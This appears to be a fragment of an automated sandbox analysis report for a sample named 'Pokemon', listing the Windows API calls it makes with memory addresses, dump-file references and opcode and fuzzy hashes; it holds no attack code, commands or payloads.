                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00129A5D
                                                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00129A72
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00129ABA
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00129AF0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 51cc5d2d7f410ee3660af527b7d2356a9ce49f1901b28d0a767b5a2b9a2a7fc9
                                                                                                                                                                                                                                                                                      • Instruction ID: c80db5bc4fc0f7afcbe65312bd43df2b116e6f93306d10812b27bb3296c3c549
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51cc5d2d7f410ee3660af527b7d2356a9ce49f1901b28d0a767b5a2b9a2a7fc9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B721BC34600228BFCF298F98EC48EFE7BB9EB49310F404165F9059B1A1D77599A1EB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,0012DC30), ref: 000FDBA6
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000FDBB5
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 000FDBC4
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0012DC30), ref: 000FDC21
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 806f93a063bb7e5317b23c16bcb68e0acac0d6fa0c7ac54238b4fe6dafcc6ed3
                                                                                                                                                                                                                                                                                      • Instruction ID: 481c18221966a9f4da87dad7704d68608ddc6ab971f12155450cfb421c3c97b4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 806f93a063bb7e5317b23c16bcb68e0acac0d6fa0c7ac54238b4fe6dafcc6ed3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A21E53050930A9F8710DF24D9808AFB7E9EF56364F104A1EF599C36A2DB30D946EB82
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 001232A6
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001232C0
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001232CE
                                                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001232DC
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 457b41c8962201024e075577dbc1b7e6154efec22431779eed4e59305132c4f4
                                                                                                                                                                                                                                                                                      • Instruction ID: ffe1e51096f671d783be13d1e8034ed03399ecafa1c23d085b7a00ba582b28a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 457b41c8962201024e075577dbc1b7e6154efec22431779eed4e59305132c4f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D421D631604121BFD7149F24E845FAA7BA5EF85314F248258F8368B6D2C779ED92C7D0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?), ref: 000F96F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrcpyW.KERNEL32(00000000,?,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F9719
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F96E4: lstrcmpiW.KERNEL32(00000000,?,000F8271,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?), ref: 000F974A
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F828A
                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F82B0
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,000F90BB,00000000,?,0000001C,?,?,00000000), ref: 000F82EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                      • Opcode ID: a7e9fc5a7806e602e0e8593e7556d90199afd99777bbd9fd4fd08327aeef9c2a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e0f471f12db2170a0b006e430add858bf60489e2f80aedf95ffec823655a45f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e9fc5a7806e602e0e8593e7556d90199afd99777bbd9fd4fd08327aeef9c2a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49110B7A200346BBCB149F38D845EFA77E9FF45750B50802AFA42C76A0EF319951D750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 0012615A
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012616C
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00126177
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001262B5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a7325b6ae37de43f9ba810f7f13f5a5a243329f0545df963bd99e53809015a21
                                                                                                                                                                                                                                                                                      • Instruction ID: bbd32ebf4cc50dcca5f636c04cf301a8fe684bd6de1229219174ea7c2a845f62
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7325b6ae37de43f9ba810f7f13f5a5a243329f0545df963bd99e53809015a21
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E119375900228AADB20DF64ADC4EEF7BBCFF51754B10412AFA15D60C2E774D961CB60
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 69e2b068f38c266d3703d15270e56b444224fec003ff9f5ffcf12ee62f0d9496
                                                                                                                                                                                                                                                                                      • Instruction ID: 61450220638bec58add8ca72ad52c9812528cba56a7ce10ce6942613e490c004
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e2b068f38c266d3703d15270e56b444224fec003ff9f5ffcf12ee62f0d9496
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A901A2B22052167EF67127B8BCC0F6F679DDF513B8B35072EB521A19D3DA608C90D160
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000F2394
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23A6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23BC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000F23D7
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 68a93c792b17b56504e0feb88fe5b3fdbc0434b42a86e1278ee0fd6704570a42
                                                                                                                                                                                                                                                                                      • Instruction ID: 054372345f6c43484c005b9ecbc541aa54a0e4726c4c840acbe8977de6d054a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a93c792b17b56504e0feb88fe5b3fdbc0434b42a86e1278ee0fd6704570a42
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68110C76900218FFDB119B95CD85FADBBB8FB08750F210091E601B7290D6716F55EB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00091AF4
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 000D31F9
                                                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 000D3203
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000D320E
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0836a3d91cdd94a74edc4c1d1ba064d9cb3aed7c430a8c0a25c094c3da20db96
                                                                                                                                                                                                                                                                                      • Instruction ID: 7ed5073baf145049ab58f231bebe1600ecc22488839e4107c46db4ecee2fb0cc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0836a3d91cdd94a74edc4c1d1ba064d9cb3aed7c430a8c0a25c094c3da20db96
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A114C35A0112AFBDF10DFA4D9459EE77B8EB05344F100452F902E3241D770BE92DBA6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000FEB14
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 000FEB47
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000FEB5D
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000FEB64
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 23da8d54a263f00cc86ba9488dc9bfc9faaf4043a221d4a9d440a81e7afa23fd
                                                                                                                                                                                                                                                                                      • Instruction ID: b947634b642b4af47833fc97a26b2dcff1fe33f8dee0c1ceb4eb891d61d4e5b5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23da8d54a263f00cc86ba9488dc9bfc9faaf4043a221d4a9d440a81e7afa23fd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B110872900258BFC7119BA8DC05ADF7FADBB45310F144256F915D3BA0D7B4894487A0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,000BD369,00000000,00000004,00000000), ref: 000BD588
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000BD594
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000BD59B
                                                                                                                                                                                                                                                                                      • ResumeThread.KERNEL32(00000000), ref: 000BD5B9
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6d01a83adf35a9051459ff2c2b30fd507400e5620bddd941695a233b3130bd6a
                                                                                                                                                                                                                                                                                      • Instruction ID: 14a9a2d3fb81d3cd89e45f709525c364f80d1d8dac54b422338ae2f58637d636
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d01a83adf35a9051459ff2c2b30fd507400e5620bddd941695a233b3130bd6a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D01D272404614BBCB306FA5EC05BEEBBA8EF81734F20021BF925871E1EB709951C6A1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 000978C5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 139249de3aa8e563d40bd8d6ba4b1d93158eee66fe437cc42cc87868cade8f0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 68ee6439812268b08074a185cf841dc965264ac15b93fb1c79de31f6a65d40af
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139249de3aa8e563d40bd8d6ba4b1d93158eee66fe437cc42cc87868cade8f0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5118B73505548BFDF225F90DC58EEB7BA9FF08368F040116FA0952160DB359CA0EBA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue), ref: 000C3418
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue,00133260,FlsSetValue,00000000,00000364,?,000C31B9), ref: 000C3424
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000C338D,00000364,00000000,00000000,00000000,?,000C35FE,00000006,FlsSetValue,00133260,FlsSetValue,00000000), ref: 000C3432
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5297127ec0696aa75df15744989c2e959be9aa54682af9632de98466509276e4
                                                                                                                                                                                                                                                                                      • Instruction ID: a4f9c1e82e20076d58ee56f70fa925e7998502b152649ae3d99bed23c2c43df6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5297127ec0696aa75df15744989c2e959be9aa54682af9632de98466509276e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101D032621222ABCB775B79EC44F5F7B98BF05B617214628F906D7540D730ED52C6E0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBA8B
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBAB0
                                                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBABA
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FB69A,?,00008000), ref: 000FBAED
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 49d995cc55feae476ccec4a1e8ee9dd161648f1fb6207849a9c01d8532f34659
                                                                                                                                                                                                                                                                                      • Instruction ID: 9845a89d797ac268c9f69317e3a2cd52e32e6096fe4919c0c6396605a08c5ea3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49d995cc55feae476ccec4a1e8ee9dd161648f1fb6207849a9c01d8532f34659
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40118E30D0062DE7DF10EFE5E9486FEBB78BF09711F110085D641B2940DB308661DB66
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0012888E
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 001288A6
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 001288CA
                                                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001288E5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 468e1e315b462bc8e129f073128a91a97ff1e74e52dc843a6a6b51ee31179820
                                                                                                                                                                                                                                                                                      • Instruction ID: be39df4a24e0923b86ac46b5a56207ba1e01056d92bfc6f36bab302a9eaea4cd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 468e1e315b462bc8e129f073128a91a97ff1e74e52dc843a6a6b51ee31179820
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 411142B9D00209EFDB51CFA8D884AEEBBF5FB08310F508166E915E3650D735AAA5CF50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F3712
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3723
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000F372A
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F3731
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
